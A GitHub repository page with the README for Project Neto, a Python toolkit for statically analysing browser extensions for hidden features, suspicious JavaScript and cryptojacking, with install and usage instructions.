Skip to content
Neto | A tool to analyse browser extensions
Branch: master
Clone or download

Latest commit

Fetching latest commit…
Cannot retrieve the latest commit at this time.


Type Name Latest commit message Commit time
Failed to load latest commit information.
bin v0.5 release May 7, 2018
config Add user-defined wrappers May 28, 2018
doc Update Jan 15, 2019
neto Add more suspicious strings and categories Jan 15, 2019
.gitignore Plugin update May 21, 2018 v0.5 release May 7, 2018
COPYING Add user-defined wrappers May 28, 2018 Update May 7, 2018 Plugin update May 21, 2018

Project Neto: A Toolkit for Analysing Browser Plugins


Project Neto is a Python 3 package conceived to analyse and unravel hidden features of browser plugins and extensions for well-known browsers such as Firefox and Chrome. It automates the process of unzipping the packaged files to extract these features from relevant resources in a extension like manifest.json, localization folders or Javascript and HTML source files.


To install the package, the user can choose pip3.

pip3 install -e . --user

Optionally, it can also be installed with administrator privileges using sudo:

sudo pip3 install -e .

A successfull installation can be checked using:

python3 -c "import neto; print(neto.__version__)"

Quick Start

To perform the analysis of an extension, the analyst can type the following:

neto analysis -u

The extension will be automatically downloaded and unzipped by default in the system's temporal folder.

However, the analyst can also launch de analysis towards a locally stored extension:

neto analysis -e ./my-extension-name.xpi

After the static analysis is performed, it will generate a Json file that is stored by default in a newly created folder named output.

If you use Python, you can also import the package as a library in your own Python modules:

>>> from neto.lib.extensions import Extension
>>> my_extension = Extension ("./sample.xpi")
>>> my_extension.filename
>>> my_extension.digest

Apart from accesing to the elements found in the extension using properties, the analyst can always have access to it as a dictionary:

>>> my_extension.__dict__
{'_analyser_version': '0.0.1', '_digest': '849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'…

If you are not using Python, you can use the JSON RPC daemon:

$ neto daemon

         ____            _           _      _   _      _
        |  _ \ _ __ ___ (_) ___  ___| |_   | \ | | ___| |_ ___
        | |_) | '__/ _ \| |/ _ \/ __| __|  |  \| |/ _ \ __/ _ \ 
        |  __/| | | (_) | |  __/ (__| |_   | |\  |  __/ || (_) |
        |_|   |_|  \___// |\___|\___|\__|  |_| \_|\___|\__\___/

                                    Developed by @ElevenPaths
                                    Version: 0.5.0b

 * Running on http://localhost:14041/ (Press CTRL+C to quit)

You can then run commands using your preferred JSON RPC library to write a client (we have written a short demo in the bin folder) or even curl:

 curl --data-binary '{"id":0, "method":"remote", "params":[""], "jsonrpc": "2.0"}'  -H 'content-type:text/json;' http://localhost:14041


The following is a non-exhaustive list of the features included in this package are the following:

  • Manifest analysis.
  • Internal file hashing.
  • Entities extraction using regular expressions: IPv4, email, cryptocurrency addresses, URL, etc.
  • Comments extraction from HTML, CSS and JS files.
  • Cryptojacking detection engine based on known mining domains and expressions.
  • Suspicious Javascript code detection such as eval().
  • Certificate analysis if provided.
  • Batch analysis of previously downloaded extensions.
You can’t perform that action at this time.